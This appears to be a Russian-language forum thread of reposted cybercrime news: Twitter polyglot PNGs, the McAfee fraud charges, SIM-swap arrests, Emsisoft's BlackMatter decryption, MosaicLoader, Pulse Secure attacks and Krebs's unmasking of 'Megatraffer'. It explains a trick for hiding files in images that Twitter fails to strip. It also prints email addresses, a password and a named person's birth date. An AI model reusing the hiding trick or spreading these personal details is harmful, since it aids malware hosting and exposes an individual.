Войдя таким способом в систему, мошенники выставляли фальшивые счета от имени подставной компании, надеясь, подлог не заметят, и счета будут оплачены. Таких счетов было создано примерно на 500 млн юаней (примерно 57,5 млн рублей).
Предполагается, что злоумышленники также взломали приложение для выдачи бизнес-лицензий и добавили в систему собственные биометрические данные, чтобы иметь возможность входить в систему как легитимные пользователи.
• Source: http://www.xinhuanet.com/2021-03/30/c_1127270651.htm
Исследователь и программист Дэвид Бьюкенен (David Buchanan) продемонстрировал, что в Twitter можно загрузить изображения, модифицированные при помощи стеганографии. То есть внутри картинок можно разместить до 3 Мб данных. Как оказалось, социальная сеть не очищает изображения должным образом.
Дэвид Бьюкенен приложил к своим сообщениям примеры таких изображений, в которых спрятал ZIP-архив с исходным кодом и MP3-файл (приведенное ниже изображение размером 6 Кб содержит полный архив). Хотя эти файлы PNG, размещенные в Twitter, на первый взгляд представляют собой обычные картинки, простой загрузки и изменения их расширения достаточно для получения иного содержимого.
__https://twitter.com/x/status/1371974874856587268
«Загрузите файл, переименуйте в .mp3 и откройте в VLC, чтобы получить сюрприз.
(Примечание: убедитесь, что вы загрузили версию файла с полным разрешением,
должно быть 2048x2048 пикселей)», —
говорит
эксперт.
Изображение, размещенное на сервере Twitter
(https://pbs.twimg.com/media/Ewo_O6zWUAAWizr?format=png&name=large
) имеет
размер 2,5 Мб и действительно содержит mp3-файл с треком Never Gonna Give You
Up от Рика Эстли.
Исследователь уже опубликовал на GitHub исходный код для создания таких файлов: tweetable-polyglot- png.
«Обычно Twitter сжимает изображения, но в некоторых случаях этого не происходит. Также Twitter пытается удалить все несущественные метаданные, чтобы polyglot-файлы не работали. Но я обнаружил новый трюк: вы можете добавлять данные в конец DEFLATE-потока (часть файла, где хранятся сжатые данные пикселей), и Twitter не будет их удалять», — объяснил Бьюкенен.
Click to expand...
Тот факт, что Twitter не всегда может удалить постороннюю информацию из
изображений, открывает злоумышленникам возможности для злоупотреблений
платформой. К примеру, в файл PNG может быть помещен вредоносный код,
облегчающий управление малварью и необходимый для C&C-нужд. Тогда как полное
блокирование трафика изображений из Twitter и домена pbs.twimg.com
может
повлиять на легитимные операции.
Исследователь говорит, что уже пытался сообщить разработчикам Twitter об аналогичной проблеме с файлам JPEG, но тогда ему ответили, что это не ошибка, связанная с безопасностью. Поэтому уведомлять компанию об аналогичной проблеме с файлами PNG Бьюкенен уже не стал.
Осенью 2020 года основатель компании McAfee Джон Макафи был арестован в Испании, так как его обвинили в уклонении от уплаты налогов, умышленном уклонении от подачи налоговых деклараций и нарушении закона о ценных бумагах.
Согласно обвинительному заключению Минюста, Макафи не уплатил налоги на средства, которые заработал в период с 2014 по 2018 год. Также правительство заявляло, что Макафи давно уклоняется от встреч с налоговыми инспекторами, и пытался скрыть свои активы, включая недвижимость и яхту (как правило, путем передачи права собственности другим людям).
Уже тогда было известно, что американские власти собираются предъявить Макафи отдельные обвинения, связанные с его активностью в Twitter. Дело в том, что, по данным властей, он заработал миллионы долларов на своих многочисленных подписчиках, рекламируя различные криптовалюты (и тоже не уплатил с этого никаких налогов). Кроме того отмечалось, что в последние годы Макафи регулярно получал гонорары за различные выступления и консультации, а также заработал на продаже прав на экранизацию истории своей жизни.
Как и планировалось, теперь Министерство юстиции США выдвинуло ряд новых обвинений. По данным следователей, мошенничество и отмывание денег принесли Макафи более 13 000 000 долларов США. Также в судебных документах фигурирует и Джимми Гейл Уотсон младший (Jimmy Gale Watson Jr.), который в последние годы отвечал за личную безопасность Макафи, а также входил в его «криптовалютную команду».
Согласно судебным документам, Макафи и Уотсон много лет обманывали криптовалютных инвесторов. Впервые эту схему использовали с декабря 2017 года по октябрь 2018 года, и она представляла собой классическую вариацию pump-and- dump. То есть Макафи и другие члены его команды покупали большое количество малоизвестных криптовалют, которые Макафи затем активно рекламировал в своем Twitter. Как только внимание к той или иной монете были привлечено, и ее цена возрастала, Макафи и его товарищи сбывали эти активы с рук. Только в 2017-2018 годах эта тактика принесла им около двух миллионов долларов, а доверявшие Макафи инвесторы понесли огромные убытки, когда криптовалюты в итоге сильно потеряли в цене.

Также официальные лица утверждают, что Макафи утаивал информацию о платных рекомендациях, которые он регулярно давал в Twitter, делая ложные заявления на немалую аудиторию своих подписчиков. Так, в 2017-2018 годы Джон Макафи неоднократно продвигал в своем Twitter различные криптовалютные ICO. По сути это была лишь платная реклама, о чем Макафи умалчивал, и даже активно отрицал этот факт, хотя подписчики регулярно спрашивали его об этом. В итоге Макафи и его партнеры заработали более 11 000 000 долларов на такой «рекламе», утверждает Министерство юстиции США.
В настоящее время Макафи по-прежнему находится под стражей в Испании, и только по последним предъявленным обвинениям ему грозит до 30 лет лишения свободы.
Источник: xakep.ru/2021/03/09/mcafee-indicts/
Следственным управлением УСК по городу Минску завершено расследование уголовного дела в отношении восьми граждан Республики Беларусь, которые обвиняются в несанкционированном доступе к компьютерной информации, использовании вредоносных программ, а также хищении денег с банковских карт в особо крупном размере.
По данным следствия, в период с октября 2017 по сентябрь 2019 года обвиняемые посредством использования вредоносного программного обеспечения получили несанкционированный доступ к ряду интернет-ресурсов. После чего они завладели данными к учетным записям и электронным почтовым ящикам иностранных граждан, при помощи которых получили сведения о реквизитах банковских карт иностранцев.
Суть противоправной деятельности заключалась в том, что пока владельцы карт даже не подозревали о том, что с их счетов похищаются деньги, фигуранты, используя различные мобильные приложения и сайты, вводили данные карт иностранных граждан и приобретали предметы одежды и обуви, компьютерную технику, товары интимного назначения и многое другое.
Кроме этого, правоохранителями в ходе проведения следственных действий и оперативно-розыскных мероприятий установлены иные эпизоды противоправной деятельности обвиняемых, в том числе оплаты услуг такси и доставки еды, покупка авиабилетов и билетов в кинотеатр.
Почти за два года своей преступной деятельности путем несанкционированного доступа к карт-счетам граждане Республики Беларусь похитили денежные средства в размере более 43 тысяч рублей, совершив свыше 1 700 операций. Следователями проведены обыски по местам жительства обвиняемых, наложен арест на имущество стоимостью более 17 тысяч рублей. Изучены и приобщены к материалам уголовного дела сведения, предоставленные международными платежными системами Mastercard и Visa.
В ходе расследования уголовного дела изучены личности обвиняемых. Все они жители различных регионов страны, в том числе Минска, Минской и Гомельской областей, в возрасте от 21 до 24 лет. Ранее никто из них не привлекался к уголовной ответственности. Один обвиняемый нигде не работает и не учится, остальные работают по различным специальностям, к примеру, системный администратор, водитель такси, мастер-леса и слесарь.
Действия фигурантов в зависимости от роли каждого из них квалифицированы следствием как хищение путем использования компьютерной техники, использование вредоносных программ и несанкционированный доступ к компьютерной информации. К одному из них применена мера пресечения в виде залога, к остальным – подписка о невыезде и надлежащем поведении.
Расследование уголовного дела завершено. Материалы переданы прокурору для направления в суд.
В ходе международной операции правоохранители арестовали десять подозреваемых в краже более $100 млн в криптовалюте с помощью SIM-свопинга.
arrests for sim-swapping that targeted celebrities in the USA. The suspects are believed to have stolen over $100m in cryptocurrencies by gaining access to and taking control of apps and changing passwords. https://t.co/GxSLWOFF8u
Click to expand...
По данным Европола, двоих подозреваемых задержали на Мальте и в Бельгии, позже арестовали еще 8 членов хакерской группировки.
В течение 2020 года хакеры атаковали «тысячи жертв, включая известных блогеров, звезд спорта, музыкантов и членов их семей». В основном их целью были жители США.
Хакеры получали доступ к телефонам пользователей, что позволяло им похищать средства и персональную информацию. Злоумышленники также использовали взломанные аккаунты в соцсетях, публикуя информацию или ведя переписку от имени жертв.
В операции были задействованы правоохранители США, Великобритании, Бельгии, Мальты и Канады.
• Source: europol.europa.eu/newsroom/news/ten-hackers-arrested-for-string-of- sim-swapping-attacks-against-celebrities
Всех с праздником ! Христос Воскресе !
Команда сыщиков из частных служб безопасности в своем первом публичном описании своих усилий обсуждает, как они использовали ошибки киберпреступников, чтобы незаметно помочь жертвам восстановить свои данные.
Николь Перлрот 24 октября 2021 г., 5:00 по восточному времени.
В год, изобилующий атаками программ-вымогателей, когда киберпреступники держали в заложниках данные полицейских управлений, продуктовых и аптечных сетей, больниц, трубопроводов и водоочистных сооружений с помощью компьютерного кода, это была победа, редкая по масштабам успеха. В течение нескольких месяцев команда экспертов по безопасности мчалась, чтобы помочь жертвам известной группы программ-вымогателей незаметно восстановить свои данные, не заплатив злоумышленникам ни копейки. Все началось в конце лета, после того, как киберпреступники, стоящие за атакой вымогателя Colonial Pipeline, известной как DarkSide, появились под новым названием BlackMatter. Вскоре киберпреступники совершили вопиющую ошибку, которая, скорее всего, обошлась им в десятки, если не сотни миллионов долларов. Преступники- вымогатели шифруют данные жертвы и требуют выкуп, иногда в миллионы долларов, за возвращение доступа. Но когда BlackMatter совершил критическую ошибку в обновлении своего кода, исследователи из Emsisoft, фирмы по кибербезопасности из Новой Зеландии, поняли, что они могут воспользоваться ошибкой, расшифровать файлы и вернуть доступ законным владельцам данных. Emsisoft спешно выследила десятки жертв в Соединенных Штатах, Великобритании и Европе, чтобы помочь им тайно разблокировать их данные. При этом фирма хранила миллионы долларов в криптовалюте из казны киберпреступников. Согласно отчету исследовательской компании Cybersecurity Ventures, это была недолгая победа в игре «кошки-мышки» с программами-вымогателями, которая, как ожидается, обойдется организациям в 20 миллиардов долларов убытков в этом году. Это было настолько необычно, что даже жертвы, данные которых были спасены, не могли поверить в это. Многие думали, что Emsisoft занимается мошенничеством. Представители Emsisoft описали свою операцию, о которой ранее не сообщалось, в серии интервью The New York Times. «Сначала было много шока и недоверия», - сказал на прошлой неделе Фабиан Восар, технический директор Emsisoft. «Представьте, что у вас есть проблема. Вы думаете, что это не исправить. Все говорят, что это не исправить. Ваша паранойя в разгаре. И кто-то появляется у вашей входной двери и говорит: «Эй, кстати, я могу вам помочь».
Чтобы развеять опасения жертв, исследователи Emsisoft попросили своих знакомых в компаниях по кибербезопасности и государственных учреждениях по всему миру поручиться за них. Emsisoft не опознала жертв, но сообщила, что среди них были ключевые производители, транспортные компании и поставщики продуктов питания в континентальной Европе, Великобритании и США. График усилий Emsisoft совпадает с атаками программ-вымогателей BlackMatter в прошлом месяце на две американские сельскохозяйственные организации: NEW Cooperative, зерновой кооператив Айовы, и Crystal Valley, сельскохозяйственный кооператив Миннесоты. Оба кооператива быстро восстановились, что наводит на мысль, что Emsisoft могла помочь. Ни одна из компаний не ответила на запросы о комментариях. Эрик Голдштейн, исполнительный помощник директора по кибербезопасности в Федеральном агентстве по кибербезопасности и безопасности инфраструктуры, назвал эти усилия моделью для государственного и частного сотрудничества. Агентство пытается разработать комплексный план «для всей страны» по устранению киберугроз, особенно для «критической инфраструктуры», большая часть которой принадлежит частному сектору. CISA недавно создала Joint Cyber Defense Collaborative, которая объединяет государственные учреждения с техническими фирмами, такими как Microsoft и Amazon, телекоммуникационными компаниями, такими как AT&T и Verizon, и фирмами по кибербезопасности, такими как CrowdStrike и Palo Alto Networks, для борьбы с такими угрозами, как программы-вымогатели. Операция Emsisoft - одна из немногих недавних побед, пусть и очень поверхностных, над программами-вымогателями. В июне Министерство юстиции объявило, что оно вернуло 2,3 миллиона долларов из 4,4 миллиона долларов в криптовалюте, которые Colonial Pipeline заплатила BlackMatter.
Совсем недавно операция, проведенная несколькими правительствами, отключила REvil, крупную российскую организацию по вымогательству. Ранее агентство Reuters сообщило о межправительственных усилиях. Эти усилия последовали за несколькими меньшими победами над REvil прошлым летом. Группа, ответственная за тысячи атак с использованием программ-вымогателей, оказалась в поле зрения правительства после того, как провела громкую атаку на JBS, одного из крупнейших мировых операторов упаковки мяса, и Kaseya, компанию-разработчика программного обеспечения из Майами. Группа использовала высокоуровневый доступ Касеи к своим клиентам, чтобы удержать сотни из них в заложниках во время прошедших праздников Четвертого июля. Неделю спустя сайты REvil закрылись, что привело к предположениям о том, что правительства могли сыграть свою роль. Через неделю после этого Касея объявила, что таинственная «третья сторона» дала ей ключ для разблокировки зашифрованных данных своих клиентов. Фактически, ФБР. позже подтвердил, что получил ключ, но задержал передачу его клиентам Касеи, пока согласовывал с другими агентствами ликвидацию группы. Но прежде чем он смог действовать, REvil отключился сам по себе. REvil снова появился в сентябре, а на прошлой неделе снова исчез. Но недавняя история предполагает, что операторы REvil могут просто возродиться под новым именем.
Пока группы программ-вымогателей пользуются иммунитетом в России и других странах, программы-вымогатели продолжают преследовать американские компании и организации. Последней жертвой, по всей видимости, стала полиция в Хагерстауне, штат Мэриленд. В пятницу те же киберпреступники, которые захватили, а затем слили конфиденциальные данные из полицейского управления Вашингтона, округ Колумбия, в апреле, заявили, что взломали веб-сайт полиции Хагерстауна и украли учетные данные для входа. В пятницу поздно вечером полиция Хагерстауна сообщила, что не верит в кражу данных сотрудников, но внимательно следит за ситуацией, сменила пароли и предприняла другие меры по смягчению последствий. Американские чиновники, занимающиеся кибербезопасностью, признают, что, за исключением нескольких коротких побед, никаких существенных изменений в российских кибератаках не произошло со времени первого саммита президента Байдена с президентом России Владимиром Путиным в июне. Г-н Байден предупредил г-на Путина, что атаки на 16 критически важных секторов инфраструктуры Америки, такие как поставщики продовольствия, нанесенные в прошлом месяце, могут потребовать возмездия.
Но в прошлом месяце, когда BlackMatter поразил NEW Cooperative, киберпреступники высмеяли идею о том, что зерновой коллектив считается критически важной инфраструктурой, саркастически заявив, что «каждый понесет убытки» в чатах, которые отслеживает компания Recorded Future, занимающаяся кибербезопасностью. По словам компании, шум вокруг атаки NEW Cooperative создал дополнительные проблемы для Emsisoft. Emsisoft находила жертв BlackMatter через сообщения на принадлежащей Google платформе VirusTotal, которая является своего рода поисковой системой для вредоносных программ. Эти сообщения помогли связать команды Emsisoft с чат-платформой, которую BlackMatter использовала для переговоров о выплатах выкупа со своими жертвами. Emsisoft отслеживала чаты, чтобы узнать, не упоминали ли киберпреступники или жертвы название своей организации, а затем использовала эту информацию для связи с жертвами. Но после того, как атака NEW Cooperative попала в заголовки газет, неожиданные посетители начали оставлять оскорбления в чатах, где BlackMatter вел переговоры о платежах. Когда BlackMatter пригрозил утечкой данных NEW Cooperative в Интернете за нарушение его «правил восстановления данных», кто-то ответил неприятным оскорблением в адрес матери преступника BlackMatter. Представитель NEW Cooperative ясно дал понять в чате, что комментарий пришел не от них, а от «случайных людей из Интернета». Обмен побудил BlackMatter закрыть доступ к своим онлайн-чатам и начать проверку всех, кто вошел. При этом Emsisoft потеряла ключевой способ добраться до жертв. Emsisoft знала, что не сможет опубликовать свою секретную способность, не сообщив BlackMatter. Но компании все же удалось связаться с несколькими жертвами BlackMatter, данные которых были размещены в Интернете. (Чтобы усилить давление, группы программ-вымогателей теперь размещают информацию о жертве в Интернете, когда она отказывается платить.) Emsisoft также тесно сотрудничала с CISA и другими агентствами, чтобы охватить как можно больше жертв. «Причина, по которой операторы программ-вымогателей избежали такого большого количества преступлений, заключается в том, что до недавнего времени было слишком мало сотрудничества и общения, - сказал Бретт Кэллоу, аналитик угроз компании Emsisoft. «Это показывает, что сотрудничество частного и государственного секторов может существенно снизить их прибыль». Emsisoft знала, что время на исходе. Неизбежно BlackMatter задался вопросом, почему так много жертв перестали платить выкуп или почему многие даже не удосужились ответить. Наконец, в прошлом месяце BlackMatter обнаружил ошибку. Это снова стало чертежной доской для исследователей Emsisoft и других компаний. «Мы больше не можем реально помогать жертвам, но у нас было довольно долгое время», - сказал г-н Восар.
Источник: <https://www.nytimes.com/2021/10/24/technology/ransomware-emsisoft- blackmatter.html>
Исследователи из Bitdefender обнаружили нового вредоносного загрузчика, который распространяется под видом пиратского софта через поисковую рекламу. В ИБ-компании новобранцу присвоили имя MosaicLoader — из-за причудливой внутренней структуры, призванной затруднить обнаружение и анализ.
С этой же целью злоумышленники копируют оформление исполняемых файлов легитимных приложений — снабжают свой дроппер безобидным именем, привлекательной иконкой, цифровой подписью (фальшивой или краденой) и уместными метаданными. Код вредоноса обфусцирован, а поток выполнения выглядит следующим образом:
Тестирование образцов MosaicLoader показало, что все они нацелены на загрузку дополнительных зловредов со сторонних серверов, список которых даунлоудер получает из центра управления. Характер финальной полезной нагрузки при этом различен — от криптомайнеров и похитителей куки до RAT-троянов и бэкдоров.
Командный сервер MosaicLoader прописан в США, его URL вшит в код. Примечательно, что для связи с C2 резидентные зловреды могут использовать разные домены, но все они резолвятся в один и тот же IP-адрес. Согласно данным телеметрии Bitdefender, текущая вредоносная кампания имеет глобальный охват.
• Source: [https://www.bitdefender.com/files/N...R-Whitepaper-MosaicLoader- creat5540-en- EN.pdf](https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender- PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf)
Журнал Newsweek выпустил расследование о “тайной армии” США. За последнее
десятилетие Пентагон создал тайное подразделение, куда входят порядка 60 тысяч
человек. Они работают под прикрытием фейковых личностей. Программа называется
Signature Reduction (SR), что можно перевести как “Уменьшение заметности” или
проще — “Маскировка”.
Штат этой структуры — в десять раз больше, чем подпольная сеть ЦРУ. Агенты
работают под прикрытием как в армии, так и в политических структурах и частном
секторе. В том числе в Интернете.
У этих людей — вымышленные имена и биографии. Тысячи из них работают в киберпространстве.
Журнал уточняет, что этот род войск являет собой “полностью нерегулируемую деятельность”, которая идет вразрез с законами США и Женевскими конвенциями.
Newsweek заявляет, что два года собирал информацию об этой шпионской структуре. Журналисты изучали рынок вакансий, проанализировав более тысячи объявлений и 600 резюме. Журнал сделал десятки запросов чиновникам и провел несколько интервью с ними.
Сделать агента невидимым
Сеть SR насчитывает более 130 частных компаний, которые тратят 900 миллионов долларов ежегодно, обслуживая тайные операции. В их работу входят все формы маскировки агентов: создание фальшивых документов, налоговые проводки для агентов, изготовление прослушивающих и “подсматривающих” устройств, а также решений, которые помогают избежать идентификации агента — от его информационной до физической маскировки.
Особое внимание уделяется “замене” биометрических данных, чтобы обойти иностранные системы распознавания отпечатков пальцев и лица. Это делается как с помощью физических спецприспособлений, так и путем “закладок” в программном обеспечении систем распознавания, которые поставляются американцами другим странам (так называемый код ExpressLane). То есть данные просто стираются из системы удаленно или заменяются на другие. Но это, конечно, в том случае, если система биометрии куплена у США, а не, скажем, у Китая или России.
Важным элементом работы спецслужбы является “зачистка” любой правдивой информации об агентах как в Интернете, так и в закрытых базах данных, не относящихся к подразделению.
В том числе лицо агента могут убрать из памяти камер внешнего наблюдения там, где он мог появиться для задания. В задачи также входит зачистка данных о семьях разведчиков или создание ложных следов для тех, кто будет пытаться установить их личность.
Кто входит в Signature Reduction
Более половины состава — это силы специальных операций, которые работают в
горячих точках. Они занимаются поиском и ликвидацией террористов. Одна из
мини-сенсаций материала — работа таких специалистов на территориях Северной
Кореи и Ирана, где войны нет.
Чтобы туда проникнуть, используются ухищрения вроде изменения отпечатков
пальцев и смены внешности с помощью специальных маскировочных техник. Включая
биологически схожие с лицом человека маски. На фото, которое оказалось в
распоряжении Newsweek, — процесс маскировки молодого агента под пожилого
человека.
Второй по величине элемент — военная разведка и контрразведка. Автор статьи описывает в деталях, как работают американские разведчики на Ближнем Востоке и в Африке, а также как SR занимается их прикрытием. Много внимания уделяется как техническим ухищрениям по прослушке, так и маскировке в военных условиях.
Третий, самый новый и быстрорастущий сегмент — “тайная армия, которая никогда
не выходит из-за клавиатуры”. Это кибербойцы и сборщики разведданных, которые
выдают себя за вымышленных лиц в Сети. Они собирают открытые данные, а также
участвуют в “кампаниях по влиянию”
и манипулированию социальными сетями.
Об этом в материале Newsweek сказано крайне мало. Но важен сам факт: авторитетные медиа США открыто пишут, что их военные держат огромные фермы интернет-троллей, которые манипулируют людьми в Сети.
Парик и старенькая “Нокия”
Ряд шпионских ухищрений из арсенала спецотдела Пентагона уже засветились в историях, которые стали публичными. В мае 2013 года произошел почти комичный инцидент, больше напоминающий шпионскую комедию “Напряги извилины”, чем опытный шпионаж. Москва выслала третьего секретаря посольства США Райана Фогла. Это произошло после того, как были опубликованы фотографии задержания Фогла в нелепом парике. При нем была странная дилетантская атрибутика — четыре пары солнцезащитных очков, карта улиц, компас, фонарик, швейцарский армейский нож и сотовый телефон.
После этого в западных СМИ начали насмехаться над версией России. Отставные сотрудники ЦРУ после этого высказывали мнение в СМИ, что мир уже ушел от старой практики использования париков и фальшивых камней. Упоминание о камнях было отсылкой к случаю с Великобританией. Всего годом ранее несколько сотрудников британского посольства в Москве признались, что получали секретную информацию от завербованного российского гражданина через установленный в сквере камень, в который было вмонтировано устройство типа Bluetooth. Это было еще одним открытием российской разведки.
Однако, как оказалось, “умная” шпионская техника есть не только у американцев. В 2019 году 20 лет тюрьмы дали бывшему офицеру американской военной разведки Кевину Патрику Мэллори. Его обвинили в продаже секретов Китаю. В деле Мэллори обвинение продемонстрировало присяжным коллекцию принадлежащих ему париков и искусственных усов, больше похожих на предметы для Хэллоуина.
Однако, как рассказала Бренда Конноли (имя изменено), которая работала инженером в Управлении науки и технологий ЦРУ, смеяться над нелепой маскировкой рано. Древний телефон “Нокиа”, принадлежащий пойманному в Москве Фоглу, скрывал в себе устройство для скрытой связи. Мэллори пользовался “Самсунгом”, подаренным ему китайской разведкой. Он оказался настолько искусно переделанным внутри, что американцы так и не смогли извлечь из него собранные секретные данные.
Кроме того, у Фогла обнаружили защитный элемент RFID, предназначенный для предотвращения электронного отслеживания. А у Мэллори — флаконы с фальшивой кровью, полученные от Китая. Правда, Конноли не стала раскрывать, для чего они предназначались.
По словам эксперта, после перехвата кодов на радиочастотах возник мир тайных коммуникаций, или COVCOMM, как его называют инсайдеры. Это особые устройства шифрования, которые можно увидеть в делах Фогла и Мэллори, а также десятки различных передатчиков и приемников, спрятанных в повседневных объектах, например таких, как поддельные камни. Все, что агенту необходимо сделать для активации связи, — это просто пройти мимо целевого приемника (здания или поддельного камешка). При этом секретные сообщения зашифровываются и передаются обратно в специальные центры наблюдения. Устанавливают такие устройства военные, сотрудники спецназа, работающие над поддержкой секретных операций, в частности из “Маскировки”.
Также Конноли рассказала о нагретых тканях, которые делают солдат невидимыми для теплового обнаружения, об электрических мотоциклах, которые могут работать бесшумно, о десятках футов проводов, зашитых в одежду (при этом сами солдаты затем становятся ходячими приемниками, способными перехватывать близлежащие маломощные радиоприемники и даже сигналы сотовых телефонов).
В прошлом месяце специалисты компании FireEye заявили, что сразу две хак- группы используют уязвимость нулевого дня в Pulse Secure VPN для атак на сети американских оборонных подрядчиков и правительственных организаций по всему миру.
По данным FireEye, взломы начались еще в августе 2020 года, когда первая хак- группа, которую компания отслеживает как UNC2630, нацелилась на оборонных подрядчиков США и европейские организации. По мнению аналитиков, эти хакеры «действуют от имени правительства Китая и могут иметь связи с APT5», то есть с другой известной китайской кибершпионской группировкой.
В октябре 2020 года к атакам присоединилась вторая группа хакеров, которой FireEye присвоила идентификатор UNC2717, однако о ней специалистам не было известно практически ничего.
В обоих случаях злоумышленники устанавливали на уязвимые устройства веб-шеллы, а затем использовали их для перехода во внутренние сети жертв, откуда похищали учетные данные, письма и конфиденциальные документы.
Теперь в новом отчете FireEye пишет, что дальнейшее изучение этих атак помогло обнаружить нечто странное: по крайней мере одна из групп, участвовавших в инцидентах, начала удалять свою малварь из зараженных сетей за три дня до раскрытия.
«В период с 17 по 20 апреля 2021 года специалисты Mandiant наблюдали, как UNC2630 получает доступ к десяткам взломанных устройств и удаляет веб-шеллы, такие как ATRIUM и SLIGHTPULSE», — пишут аналитики.
Click to expand...
Действия злоумышленников выглядят подозрительно и вызывают вопросы, к примеру, не могли ли хакеры знать об интересе со стороны FireEye. Конечно, удаление малвари могло оказаться простым совпадением, однако если участникам UNC2630 было известно о том, что FireEye исследует некоторые из взломанных ими сетей, выходит, что хакеры сознательно отступили и удалили улики, чтобы защитить от исследователей другие операции.
Также FireEye сообщает, что обнаружила новые подробности этой хакерской кампании. Так, эксперты нашли четыре дополнительных штамма малвари (помимо 12 описанных ранее).
Семейство малвари| Описание| Группа
---|---|---
BLOODMINE| Утилита для анализа файлов логов Pulse Secure Connect. Извлекает
информацию, относящуюся к логинам, идентификаторам сообщений и веб-запросам, и
копирует соответствующие данные в другой файл.| UNC2630
BLOODBANK| Утилита для кражи учетных данных, которая анализирует два файла,
содержащие хэши паролей или пароли открытым тестом, и ожидает, что выходной
файл будет указан в командной строке.| UNC2630
CLEANPULSE| Утилита для патчинга памяти, может использоваться для
предотвращения возникновения определенных событий логов. Была найдена вместе с
веб-шеллом ATRIUM.| UNC2630
RAPIDPULSE| Веб-шелл, способный читать произвольные файлы. Как и другие веб-
шеллы, RAPIDPULSE — это модификация легитимного файла Pulse Secure. Может
служить загрузчиком зашифрованных файлов.| UNC2630
Кроме того, FireEye продолжает работать над выявлением взломанных устройств и их владельцев, совместно с разработчиками Pulse Secure. Эта работа позволила аналитикам узнать больше о целях злоумышленников. Так, согласно новым данным, большинство жертв — это организации, базирующиеся в США (прочие находятся в странах Европы). Хотя ранее считалось, что атаки были нацелены на оборонных подрядчиков и правительственные организации, теперь стало ясно, что злоумышленники также атаковали компании, работающие в сферах телекоммуникации, финансов и транспорта.

Если раньше аналитики FireEye писали, что только UNC2630 может иметь связи с китайским правительством, теперь они уверены, что обе группировки занимаются кибершпионажем и «поддерживают ключевые приоритеты правительства Китая».
Источник: xakep.ru/2021/05/31/unc2630-and-unc2717/
Сотрудники Отдела по борьбе с противоправным использованием информационно- коммуникационных технологий УМВД России по Орловской области совместно с коллегами из УБК МВД России пресекли противоправную деятельность жителя регионального центра 1964 года рождения, подозреваемого в приобретении, хранении и продаже контрафактного экземпляра компьютерной программы.
Полицейские в ходе проведённых оперативно-розыскных мероприятий выяснили, что в 2021 году мужчина скачал поддельную версию справочно-правового сервиса и вплоть до октября текущего года через сеть Интернет предоставлял к ней доступ гражданам за плату.
Как правило, покупатели находили объявления о продаже нелегального товара на различных тематических форумах, а за его приобретение переводили продавцу от одной до двух тысяч рублей. По предварительным подсчётам, за три года противоправной деятельности мужчина мог заработать около 7 млн рублей.
Подозреваемый был задержан сотрудниками полиции при силовой поддержке Росгвардии. По месту его проживания сыщики изъяли системные блоки, ноутбук, роутеры, жёсткие диски и банковские карты.
В настоящее время в отношении задержанного жителя Орла следственными органами возбуждено уголовное дело по признакам преступления, предусмотренного пунктом «в» части 3 статьи 146 Уголовного кодекса Российской Федерации. На время расследования фигуранту избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
• Video: https://rutube.ru/video/c4c9236a93ef73b28519cc51108e6668/?r=plemwd
Независимый журналист Брайан Кребс (Brian Krebs) выпустил расследование, в котором повторно деанонимизировал известного на даркнет-форумах пользователя Megatraffer, связав его с конкретным человеком, на середину прошлого десятилетия проживавшим в Москве.
В начале материала Кребс напомнил, что Megatraffer начал торговать украденными сертификатами подписи кода на Exploit в 2015 году. Вскоре его бизнес расширился до продажи сертификатов для криптографической подписи приложений и файлов, предназначенных для работы в Microsoft Windows, Java, Adobe AIR, Mac и Microsoft Office.
По мнению Megatraffer, поставщикам вредоносного ПО нужен сертификат из-за политики антивирусных программ, которые уделяют неподписанному ПО гораздо больше внимания. То же самое касается и функций безопасности, встроенных в браузеры. Кребс уточняет, что к 2016 году Megatraffer продавал уникальные сертификаты подписи кода по 700 долларов за штуку, а за сертификаты подписи кода с расширенной проверкой (EV Code Signing) просил 1900 долларов.
По данным компании Intel 471, занимающейся киберразведкой, с сентября 2009 года по сегодняшний день Megatraffer был активным участником как минимум семи крупнейших даркнет-площадок. В большинстве случаев он использовал адрес электронной почты 774748@gmail.com, который также применял на двух ресурсах пользователь O.R.Z.
Отслеживающая открытые базы данных компания Constella Intelligence обнаружила, что адрес 774748@gmail.com связан с несколькими паролями, но чаще всего — с буквосочетанием featar24. Обратный поиск по нему привел Кребса к адресу akafitis@gmail.com, который в 2008 году также был привязан к нику O.R.Z. на Verified. До этого akafitis@gmail.com применялся в качестве адреса электронной почты для аккаунта Fitis, который был активен на Exploit с сентября 2006-го по май 2007 года. Кроме того, пароль featar24 был связан с адресом электронной почты spampage@yandex.ru, который был привязан к нику O.R.Z. уже на сarder.ru. Помимо этого, адрес akafitis@gmail.com был использован для создания профиля в Livejournal под названием Fitis, на аватарке которого изображен большой медведь.
«Я идеальный преступник. Мои отпечатки пальцев меняются до неузнаваемости каждые несколько дней. По крайней мере, мой ноутбук в этом уверен», — написал в своем дневнике Fitis.
Его личность была раскрыта в 2010 году после того, как два крупнейших спонсора спама в фармацевтике начали войну друг с другом, а их внутренние документы оказались в распоряжении ряда международных ресерчеров. Тогда и выяснилось, что одним из самых высокооплачиваемых сотрудников партнерской программы Spamit был как раз Fitis, который привлек к работе более 75 партнеров. Выплату он получал на аккаунт в WebMoney, владелец которого при регистрации предъявил действующий российский паспорт на имя Константина Евгеньевича Фетисова, родившегося 16 ноября 1982 года рождения, и зарегистрированного в Москве.
Кроме того, наиболее любопытное доменное имя, зарегистрированное на адрес электронной почты spampage@yahoo.com, — это fitis.ru, которое, по данным DomainTools.com на 2005 год, также контролировал москвич Константин Евгеньевич Фетисов.
Что любопытно, Кребс практически ничего не сообщает о судьбе и деятельности Megatraffer после 2015 года. Его расследование в большей степени посвящено не личности Фетисова, а тому, что сертификаты подписи кода остаются востребованным в даркнете товаром.
source: krebsonsecurity[.]com/2023/06/ask-fitis-the-bear-real-crooks-sign- their-malware
Американские эксперты не исключают дальнейшего увеличения активности мошенников, специализирующихся на получении пособий по безработице. Такой вывод содержится в расследовании издания Baltimore Banner, журналисты которого опросили исследователей и представителей госорганов, чтобы осознать масштабы проблемы на примере штата Мэриленд.
Согласно полученным ими данным, в январе 2023 года получатели социальных пособий в Мэриленде сообщили о том, что у них украли более 258 тысяч долларов. Годом же ранее эта сумма была значительно меньше и не превысила отметку в 10 тысяч долларов. А уже в феврале 2023 года добычей мошенников и кардеров стали более 417 тысяч долларов.
